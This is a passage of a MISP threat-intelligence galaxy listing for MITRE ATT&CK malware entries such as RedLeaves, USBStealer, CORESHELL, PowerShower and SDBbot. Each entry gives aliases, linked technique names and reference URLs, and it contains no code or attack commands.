• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 4642. Table References

Links
RedLeaves - S0153

[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)

The tag is: *misp-galaxy:mitre-malware=“RedLeaves - S0153”*

RedLeaves - S0153 is also known as:

- RedLeaves
- BUGJUICE

RedLeaves - S0153 has relationships with:

- similar: *misp-galaxy:rat=“RedLeaves” with estimative-language:likelihood-probability=“likely”*
- similar: *misp-galaxy:tool=“BUGJUICE” with estimative-language:likelihood-probability=“likely”*
USBStealer - S0136

[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)

The tag is: `misp-galaxy:mitre-malware="USBStealer - S0136"`

USBStealer - S0136 is also known as:
• USBStealer
• USB Stealer
• Win32/USBStealer

USBStealer - S0136 has relationships with:

• similar: misp-galaxy:tool="USBStealer" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

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</table>
Janicab - S0163

Janicab ([Janicab](https://attack.mitre.org/software/S0163)) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)

The tag is: `misp-galaxy:mitre-malware="Janicab - S0163"`

Janicab - S0163 is also known as:

- Janicab

Janicab - S0163 has relationships with:

- similar: `misp-galaxy:tool="Janicab" with estimative-language:likelihood-probability="likely"`

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CORESHELL - S0137

CORESHELL ([CORESHELL](https://attack.mitre.org/software/S0137)) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL. (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: `misp-galaxy:mitre-malware="CORESHELL - S0137"`

CORESHELL - S0137 is also known as:

- CORESHELL
- Sofacy
- SOURFACE

CORESHELL - S0137 has relationships with:
• similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

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**FLIPSIDE - S0173**

[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)

The tag is: misp-galaxy:mitre-malware="FLIPSIDE - S0173"

FLIPSIDE - S0173 is also known as:

• FLIPSIDE
FLIPSIDE - S0173 has relationships with:


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<td><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></td>
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POWERTON - S0371

[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)

The tag is: *misp-galaxy:mitre-malware="POWERTON - S0371"*

POWERTON - S0371 is also known as:

- POWERTON

POWERTON - S0371 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

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</table>
Marcher - S0317

[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)

The tag is: `misp-galaxy:mitre-malware="Marcher - S0317"`

Marcher - S0317 is also known as:

- Marcher

Marcher - S0317 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"` with estimative-language:likelihood-probability="almost-certain"

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</table>

OLDBAIT - S0138

[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: `misp-galaxy:mitre-malware="OLDBAIT - S0138"`

OLDBAIT - S0138 is also known as:

- OLDBAIT
- Sasfis

OLDBAIT - S0138 has relationships with:

- similar: `misp-galaxy:tool="OLDBAIT"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

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**FlawedAmmyy - S0381**

[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software. (Citation: Proofpoint TA505 Mar 2018)

The tag is: `misp-galaxy:mitre-malware="FlawedAmmyy - S0381"`

FlawedAmmyy - S0381 is also known as:

- FlawedAmmyy

FlawedAmmyy - S0381 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

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HAWKBALL - S0391

[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)

The tag is: misp-galaxy:mitre-malware="HAWKBALL - S0391"

HAWKBALL - S0391 is also known as:

• HAWKBALL

HAWKBALL - S0391 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

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Allwinner - S0319

[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)

The tag is: misp-galaxy:mitre-malware="Allwinner - S0319"

Allwinner - S0319 is also known as:

• Allwinner

Allwinner - S0319 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0319">https://attack.mitre.org/software/S0319</a></td>
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<td><a href="https://thehackernews.com/2016/05/android-kernal-exploit.html">https://thehackernews.com/2016/05/android-kernal-exploit.html</a></td>
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PowerDuke - S0139

[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through
Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)

The tag is: *misp-galaxy:mitre-malware="PowerDuke - S0139"*

**PowerDuke - S0139** is also known as:

- **PowerDuke**

PowerDuke - S0139 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"* with estimative-language:likelihood-probability="almost-certain"
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**BabyShark - S0414**

[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)

The tag is: *misp-galaxy:mitre-malware="BabyShark - S0414"*

BabyShark - S0414 is also known as:

- BabyShark

BabyShark - S0414 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

ChChes - S0144

[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: `misp-galaxy:mitre-malware="ChChes - S0144"`

ChChes - S0144 is also known as:

- ChChes
- Scorpion
- HAYMAKER

ChChes - S0144 has relationships with:

- similar: `misp-galaxy:tool="HAYMAKER"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="ChChes"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0144">https://attack.mitre.org/software/S0144</a></td>
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<tr>
<td><a href="http://blog.jpcert.or.jp/2017/02/chches-malware%E2%80%9493d6.html">http://blog.jpcert.or.jp/2017/02/chches-malware—93d6.html</a></td>
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<td><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></td>
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<tr>
<td><a href="https://twitter.com/ItsReallyNick/status/850105140589633536">https://twitter.com/ItsReallyNick/status/850105140589633536</a></td>
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</table>

**PowerShower - S0441**

[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="PowerShower - S0441"

PowerShower - S0441 is also known as:
• PowerShower

PowerShower - S0441 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0441">https://attack.mitre.org/software/S0441</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/">https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/</a></td>
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<tr>
<td><a href="https://securelist.com/recent-cloud-atlas-activity/92016/">https://securelist.com/recent-cloud-atlas-activity/92016/</a></td>
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</table>
**BOOSTWRITE - S0415**

[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: FireEye FIN7 Oct 2019)

The tag is: `misp-galaxy:mitre-malware="BOOSTWRITE - S0415"`

**BOOSTWRITE - S0415 is also known as:**

- BOOSTWRITE

**BOOSTWRITE - S0415 has relationships with:**

- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0415">https://attack.mitre.org/software/S0415</a></td>
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**POWERSOURCE - S0145**

[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)

The tag is: `misp-galaxy:mitre-malware="POWERSOURCE - S0145"`

**POWERSOURCE - S0145 is also known as:**

- POWERSOURCE
- DNSMessenger
POWERSOURCE - S0145 has relationships with:

- similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0145">https://attack.mitre.org/software/S0145</a></td>
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<tr>
<td><a href="http://blog.talosintelligence.com/2017/03/dnsmessenger.html">http://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></td>
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</table>

**LoudMiner - S0451**

[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS. (Citation: ESET LoudMiner June 2019)

The tag is: misp-galaxy:mitre-malware="LoudMiner - S0451"

LoudMiner - S0451 is also known as:

- LoudMiner

LoudMiner - S0451 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0451">https://attack.mitre.org/software/S0451</a></td>
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<td><a href="https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/">https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/</a></td>
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</tbody>
</table>
WellMess - S0514

[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).

The tag is: `misp-galaxy:mitre-malware="WellMess - S0514"

WellMess - S0514 is also known as:

- WellMess

WellMess - S0514 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0514">https://attack.mitre.org/software/S0514</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b</a></td>
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<td><a href="https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html">https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html</a></td>
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</tbody>
</table>

TEXTMATE - S0146

[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)

The tag is: *misp-galaxy:mitre-malware="TEXTMATE - S0146"

TEXTMATE - S0146 is also known as:

• TEXTMATE
• DNSMessenger

TEXTMATE - S0146 has relationships with:

• similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="http://blog.talosintelligence.com/2017/03/dnsmessenger.html">http://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></td>
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</tbody>
</table>

SDBbot - S0461

[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader
components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

The tag is: *misp-galaxy:mitre-malware="SDBbot - S0461"*

SDBbot - S0461 is also known as:

- SDBbot

SDBbot - S0461 has relationships with:

- **uses:** *misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Proxy - T1090"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"* with estimative-language:likelihood-probability="almost-certain"
- **uses:** *misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"* with estimative-language:likelihood-probability="almost-certain"
